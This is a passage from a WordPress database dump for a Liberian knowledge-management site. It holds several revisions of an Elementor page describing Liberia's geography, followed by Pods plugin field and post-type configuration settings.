the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\\n\\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\\n\\nLiberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4381,444,'_elementor_edit_mode','builder'),(4382,444,'_elementor_template_type','wp-page'),(4383,444,'_elementor_version','2.7.5'),(4384,444,'_wp_page_template','default'),(4385,444,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\\n\\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\\n\\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\\n\\nLiberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4389,445,'_elementor_edit_mode','builder'),(4390,445,'_elementor_template_type','wp-page'),(4391,445,'_elementor_version','2.7.5'),(4392,445,'_wp_page_template','default'),(4393,445,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.<\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4397,446,'_elementor_edit_mode','builder'),(4398,446,'_elementor_template_type','wp-page'),(4399,446,'_elementor_version','2.7.5'),(4400,446,'_wp_page_template','default'),(4401,446,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.<\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4402,446,'_elementor_controls_usage','a:5:{s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;s:22:\"image_custom_dimension\";i:1;s:5:\"align\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(4404,447,'_elementor_edit_mode','builder'),(4405,447,'_elementor_template_type','wp-page'),(4406,447,'_elementor_version','2.7.5'),(4407,447,'_wp_page_template','default'),(4408,447,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Republic of Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean.<span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">\\u00a0<\\/span><span style=\\\"font-size: 16px;\\\">In terms of land area, Liberia\\u00a0<\\/span><span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">\\u00a0is\\u00a0<\\/span><span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">approximately 111,369 km2 and <\\/span><span style=\\\"font-size: 16px;\\\">is the fifth smallest country in Africa.<\\/span><\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4412,448,'_elementor_edit_mode','builder'),(4413,448,'_elementor_template_type','wp-page'),(4414,448,'_elementor_version','2.7.5'),(4415,448,'_wp_page_template','default'),(4416,448,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Republic of Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean.<span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">\\u00a0<\\/span><span style=\\\"font-size: 16px;\\\">In terms of land area, Liberia\\u00a0<\\/span><span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">\\u00a0is\\u00a0<\\/span><span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">approximately 111,369 km2 and <\\/span><span style=\\\"font-size: 16px;\\\">is the fifth smallest country in Africa.<\\/span><\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4421,412,'built_in_post_types_epa_document','1'),(4422,413,'built_in_post_types_epa_document','1'),(4423,422,'old_name','publisher'),(4424,423,'text_repeatable','0'),(4425,423,'old_name','year_published'),(4426,449,'_elementor_controls_usage','a:0:{}'),(4427,449,'label_singular','Project Resource'),(4428,449,'public','1'),(4429,449,'show_ui','1'),(4430,449,'supports_title','1'),(4431,449,'supports_editor','1'),(4432,449,'type','post_type'),(4433,449,'storage','meta'),(4434,449,'old_name','project_resource'),(4435,449,'publicly_queryable','1'),(4436,449,'exclude_from_search','0'),(4437,449,'capability_type','post'),(4438,449,'capability_type_custom','project_resource'),(4439,449,'capability_type_extra','1'),(4440,449,'has_archive','0'),(4441,449,'hierarchical','0'),(4442,449,'rewrite','1'),(4443,449,'rewrite_with_front','1'),(4444,449,'rewrite_feeds','0'),(4445,449,'rewrite_pages','1'),(4446,449,'query_var','1'),(4447,449,'can_export','1'),(4448,449,'default_status','draft'),(4449,449,'supports_author','0'),(4450,449,'supports_thumbnail','1'),(4451,449,'supports_excerpt','1'),(4452,449,'supports_trackbacks','0'),(4453,449,'supports_custom_fields','0'),(4454,449,'supports_comments','0'),(4455,449,'supports_revisions','0'),(4456,449,'supports_page_attributes','0'),(4457,449,'supports_post_formats','0'),(4458,449,'built_in_taxonomies_category','0'),(4459,449,'built_in_taxonomies_elementor_library_category','0'),(4460,449,'built_in_taxonomies_elementor_library_type','0'),(4461,449,'built_in_taxonomies_link_category','0'),(4463,449,'built_in_taxonomies_post_tag','0'),(4464,449,'built_in_taxonomies_resource_category','0'),(4465,449,'built_in_taxonomies_resource_tag','1'),(4467,449,'show_in_menu','1'),(4468,449,'menu_position','0'),(4469,449,'show_in_nav_menus','1'),(4470,449,'show_in_admin_bar','1'),(4471,449,'pfat_enable','1'),(4472,449,'pfat_run_outside_loop','0'),(4473,449,'pfat_append_single','append'),(4474,449,'pfat_filter_single','the_content'),(4475,449,'pfat_append_archive','append'),(4476,449,'pfat_filter_archive','the_content'),(4477,449,'rest_enable','0'),(4478,449,'read_all','0'),(4479,449,'write_all','0'),(4482,450,'_elementor_controls_usage','a:0:{}'),(4483,450,'type','pick'),(4484,450,'pick_object','custom-simple'),(4485,450,'pick_custom','On-going\nCompleted\nTerminated'),(4486,450,'required','0'),(4487,450,'text_allow_shortcode','0'),(4488,450,'text_allow_html','0'),(4489,450,'text_allowed_html_tags','strong em a ul ol li b i'),(4490,450,'text_max_length','255'),(4491,450,'website_format','normal'),(4492,450,'website_allow_port','0'),(4493,450,'website_clickable','0'),(4494,450,'website_new_window','0'),(4495,450,'website_max_length','255'),(4496,450,'website_html5','0'),(4497,450,'phone_format','999-999-9999 x999'),(4498,450,'phone_enable_phone_extension','1'),(4499,450,'phone_max_length','25'),(4500,450,'phone_html5','0'),(4501,450,'email_max_length','255'),(4502,450,'email_html5','0'),(4503,450,'password_max_length','255'),(4504,450,'paragraph_allow_html','1'),(4505,450,'paragraph_oembed','0'),(4506,450,'paragraph_wptexturize','1'),(4507,450,'paragraph_convert_chars','1'),(4508,450,'paragraph_wpautop','1'),(4509,450,'paragraph_allow_shortcode','0'),(4510,450,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(4511,450,'paragraph_max_length','0'),(4512,450,'wysiwyg_editor','tinymce'),(4513,450,'wysiwyg_media_buttons','1'),(4514,450,'wysiwyg_oembed','0'),(4515,450,'wysiwyg_wptexturize','1'),(4516,450,'wysiwyg_convert_chars','1'),(4517,450,'wysiwyg_wpautop','1'),(4518,450,'wysiwyg_allow_shortcode','0'),(4519,450,'code_allow_shortcode','0'),(4520,450,'code_max_length','0'),(4521,450,'datetime_type','format'),(4522,450,'datetime_format','mdy'),(4523,450,'datetime_time_type','12'),(4524,450,'datetime_time_format','h_mma'),(4525,450,'datetime_time_format_24','hh_mm'),(4526,450,'datetime_allow_empty','1'),(4527,450,'datetime_html5','0'),(4528,450,'date_type','format'),(4529,450,'date_format','mdy'),(4530,450,'date_allow_empty','1'),(4531,450,'date_html5','0'),(4532,450,'time_type','12'),(4533,450,'time_format','h_mma'),(4534,450,'time_format_24','hh_mm'),(4535,450,'time_allow_empty','1'),(4536,450,'time_html5','0'),(4537,450,'number_format_type','number'),(4538,450,'number_format','i18n'),(4539,450,'number_decimals','0'),(4540,450,'number_format_soft','0'),(4541,450,'number_step','1'),(4542,450,'number_min','0'),(4543,450,'number_max','100'),(4544,450,'number_max_length','12'),(4545,450,'currency_format_type','number'),(4546,450,'currency_format_sign','usd'),(4547,450,'currency_format_placement','before'),(4548,450,'currency_format','i18n'),(4549,450,'currency_decimals','2'),(4550,450,'currency_decimal_handling','none'),(4551,450,'currency_step','1'),(4552,450,'currency_min','0'),(4553,450,'currency_max','1000'),(4554,450,'currency_max_length','12'),(4555,450,'file_format_type','single'),(4556,450,'file_uploader','attachment'),(4557,450,'file_attachment_tab','upload'),(4558,450,'file_edit_title','1'),(4559,450,'file_show_edit_link','0'),(4560,450,'file_linked','0'),(4561,450,'file_limit','0'),(4562,450,'file_restrict_filesize','10MB'),(4563,450,'file_type','images'),(4564,450,'file_field_template','rows'),(4565,450,'file_add_button','Add File'),(4566,450,'file_modal_title','Attach a file'),(4567,450,'file_modal_add_button','Add File'),(4568,450,'file_wp_gallery_output','0'),(4569,450,'file_wp_gallery_link','post'),(4570,450,'file_wp_gallery_columns','1'),(4571,450,'file_wp_gallery_random_sort','0'),(4572,450,'file_wp_gallery_size','thumbnail'),(4573,450,'oembed_width','0'),(4574,450,'oembed_height','0'),(4575,450,'oembed_show_preview','0'),(4576,450,'oembed_restrict_providers','0'),(4577,450,'oembed_enabled_providers_amazoncn','0'),(4578,450,'oembed_enabled_providers_amazoncouk','0'),(4579,450,'oembed_enabled_providers_amazoncom','0'),(4580,450,'oembed_enabled_providers_amazoncomau','0'),(4581,450,'oembed_enabled_providers_amazonin','0'),(4582,450,'oembed_enabled_providers_animotocom','0'),(4583,450,'oembed_enabled_providers_cloudupcom','0'),(4584,450,'oembed_enabled_providers_collegehumorcom','0'),(4585,450,'oembed_enabled_providers_crowdsignalcom','0'),(4586,450,'oembed_enabled_providers_dailymotioncom','0'),(4587,450,'oembed_enabled_providers_facebookcom','0'),(4588,450,'oembed_enabled_providers_flickrcom','0'),(4589,450,'oembed_enabled_providers_hulucom','0'),(4590,450,'oembed_enabled_providers_imgurcom','0'),(4591,450,'oembed_enabled_providers_instagramcom','0'),(4592,450,'oembed_enabled_providers_issuucom','0'),(4593,450,'oembed_enabled_providers_kickstartercom','0'),(4594,450,'oembed_enabled_providers_meetupcom','0'),(4595,450,'oembed_enabled_providers_mixcloudcom','0'),(4596,450,'oembed_enabled_providers_redditcom','0'),(4597,450,'oembed_enabled_providers_reverbnationcom','0'),(4598,450,'oembed_enabled_providers_screencastcom','0'),(4599,450,'oembed_enabled_providers_scribdcom','0'),(4600,450,'oembed_enabled_providers_slidesharenet','0'),(4601,450,'oembed_enabled_providers_smugmugcom','0'),(4602,450,'oembed_enabled_providers_someecardscom','0'),(4603,450,'oembed_enabled_providers_soundcloudcom','0'),(4604,450,'oembed_enabled_providers_speakerdeckcom','0'),(4605,450,'oembed_enabled_providers_spotifycom','0'),(4606,450,'oembed_enabled_providers_tedcom','0'),(4607,450,'oembed_enabled_providers_tumblrcom','0'),(4608,450,'oembed_enabled_providers_twittercom','0'),(4609,450,'oembed_enabled_providers_vimeocom','0'),(4610,450,'oembed_enabled_providers_wordpresscom','0'),(4611,450,'oembed_enabled_providers_wordpresstv','0'),(4612,450,'oembed_enabled_providers_youtubecom','0'),(4613,450,'pick_format_type','single'),(4614,450,'pick_format_single','dropdown'),(4615,450,'pick_format_multi','checkbox'),(4616,450,'pick_allow_add_new','1'),(4617,450,'pick_taggable','0'),(4618,450,'pick_show_icon','1'),(4619,450,'pick_show_edit_link','1'),(4620,450,'pick_show_view_link','1'),(4621,450,'pick_limit','0'),(4622,450,'pick_user_role','a:0:{}'),(4623,450,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(4624,450,'boolean_format_type','checkbox'),(4625,450,'boolean_yes_label','Yes'),(4626,450,'boolean_no_label','No'),(4627,450,'admin_only','0'),(4628,450,'restrict_role','0'),(4629,450,'restrict_capability','0'),(4630,450,'hidden','0'),(4631,450,'read_only','0'),(4632,450,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(4633,450,'rest_read','0'),(4634,450,'rest_write','0'),(4635,450,'rest_pick_response','array'),(4636,450,'rest_pick_depth','2'),(4945,453,'_elementor_controls_usage','a:0:{}'),(4946,453,'type','wysiwyg'),(4947,453,'required','0'),(4948,453,'text_allow_shortcode','0'),(4949,453,'text_allow_html','0'),(4950,453,'text_allowed_html_tags','strong em a ul ol li b 